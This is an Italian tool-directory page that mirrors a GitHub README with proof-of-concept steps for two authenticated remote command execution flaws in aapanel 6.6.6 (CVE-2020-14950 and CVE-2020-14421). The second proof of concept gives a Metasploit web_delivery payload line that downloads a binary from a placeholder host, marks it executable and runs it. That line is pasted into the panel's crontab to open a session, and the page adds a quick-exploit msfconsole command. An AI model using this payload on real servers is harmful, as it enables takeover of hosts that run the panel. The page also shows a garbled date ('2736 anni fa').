Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
aapanel — aapanel 6.6.6 - Esecuzione di codice in remoto (autenticata) | Kitploit
Strumenti/GitHubGitHub/jenaye/aapanel
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubjenaye/aapanel

aapanel

aapanel 6.6.6 - Esecuzione di codice in remoto (autenticata)

Vedi Repository
2736 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

aapanel

aapanel 6.6.6 - CVE-2020-14950

  • Descrizione : consente agli utenti autenticati da remoto di eseguire comandi arbitrari tramite il menu impostazioni di Software Store.
  • Versione interessata : tutte le versioni <= 6.6.6

Informazioni

Per realizzare questo PoC, ho semplicemente installato il software usando docker-compose

  • Tipo di vulnerabilità : esecuzione remota di comandi (RCE autenticata)

POC

Vai al Software Store, clicca su qualsiasi riga del campo impostazioni, intercetta la richiesta quando clicchi su "start/stop/restart" e modifica/edita la richiesta per eseguire ciò che vuoi. Ecco un esempio con curl :

receStore receStore

aapanel 6.6.6 - CVE-2020-14421

  • Descrizione : consente a un attaccante di eseguire comandi arbitrari da remoto
  • Versione interessata : tutte le versioni <= 6.6.6

Informazioni

Per realizzare questo PoC, ho installato una versione pulita di Ubuntu 20.04, poi ho installato + ed eseguito questo script

Scarica lo strumento
wget
sudo
wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh
  • Tipo di vulnerabilità : esecuzione remota di comandi (RCE autenticata)

POC

Prima di tutto, configura le opzioni di web_delivery; questo creerà un payload e un listener.

web_delivery

Ora eseguilo

run

questo genererà il seguente payload:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Quindi copia/incolla così nella sezione script content del menu crontab in aapanel.

cron

Ora esegui il tuo crontab e attendi la tua sessione.

command

Exploit rapido

Basta eseguire msfconsole -r aapanel.rc copia/incolla il payload nella sezione script content e goditi la tua sessione.